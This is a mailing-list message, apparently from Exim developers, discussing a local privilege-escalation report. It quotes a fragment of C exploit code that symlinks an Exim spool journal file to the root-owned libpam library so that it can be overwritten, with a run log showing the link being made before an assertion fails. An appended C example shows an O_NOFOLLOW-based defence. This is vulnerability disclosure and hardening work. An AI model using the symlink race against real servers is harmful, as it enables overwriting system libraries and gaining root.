On 2016-09-11 Jeremy Harris <jgh@???> wrote:
> On 11/09/16 17:16, Andreas Metzler wrote:
> >> And... is that
> >> repeat-by relying on the writability of a library directory
> >> by an unpriv process?
> >
> > /lib/x86_64-linux-gnu/ is 0755 root:root.
>
> In that case I'm not seeing how this stage works:
>
> - Symlink /var/spool/exim4/input/xxxxxx-xxxxxx-xx-J to
>   /lib/x86_64-linux-gnu/libpam.so.0.83.1
>
> Perhaps I'm not understanding "to". What is the "ls -l" output for
> the symlink just created?

  strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
  dirStruct=opendir("/var/spool/exim4/msglog");
  assert(dirStruct);
  result=1;
  while(result) {
    while((dirEnt=readdir(dirStruct))) {
      if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
      system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
      strncpy(linkPath+23, dirEnt->d_name, 16);
      system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
      result=symlink(TARGET_PATH, linkPath);
      system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
      assert(!result);
      fprintf(stderr, "Relinked %s\n", linkPath);
      break;
...

$ /tmp/EximUpgrade --Upgrade
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1
/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1
/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root root 60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1
/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
lrwxrwxrwx 1 Debian-exim Debian-exim 38 Sep 11 17:20 1bj8R0-0004c9-JG-J -> /lib/x86_64-linux-gnu/libpam.so.0.83.1
Relinked /var/spool/exim4/input/1bj8R0-0004c9-JG-J
Target ready for writing
EximUpgrade: EximUpgrade-debugme.c:163: main: Assertion `result==newStatData.st_size' failed.
Aborted

cu Andreas
--
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'
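
A process that opens a spool path by name will follow a symlink such as the `-J` entry in the listing above. The following is an added example, not code from this thread or from Exim, of an open that refuses a symlinked or unexpectedly owned spool file; `open_spool_file()`, `demo()` and the temp-directory paths are hypothetical.

```c
/* Added example: open a spool file without following a planted symlink.
 * open_spool_file() and demo() are hypothetical names, not Exim code. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns an fd open for appending, or -1 with errno set. */
int open_spool_file(const char *path, uid_t expected_uid)
{
    struct stat st;
    /* O_NOFOLLOW: fail (ELOOP on Linux) if the last component is a symlink.
     * O_NONBLOCK: do not hang if a FIFO was planted under that name. */
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0) return -1;
    /* Validate the object actually opened (the fd), not the name. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != expected_uid) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed demo in a fresh temp directory: a regular "-D" file and a
 * "-J" symlink pointing at it. Returns 0 if only the regular file opens. */
int demo(void)
{
    char dir[] = "/tmp/spooldemoXXXXXX", data[64], jrnl[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(data, sizeof data, "%s/msgid-D", dir);
    snprintf(jrnl, sizeof jrnl, "%s/msgid-J", dir);
    int fd = open(data, O_CREAT | O_EXCL | O_WRONLY, 0640);
    if (fd < 0 || close(fd) != 0 || symlink(data, jrnl) != 0) return -1;
    int ok_fd = open_spool_file(data, geteuid());
    int bad_fd = open_spool_file(jrnl, geteuid());
    int bad_errno = errno;
    if (ok_fd >= 0) close(ok_fd);
    if (bad_fd >= 0) close(bad_fd);
    unlink(jrnl); unlink(data); rmdir(dir);
    return (ok_fd >= 0 && bad_fd < 0 && bad_errno == ELOOP) ? 0 : 1;
}
int main(void) { return demo(); }
```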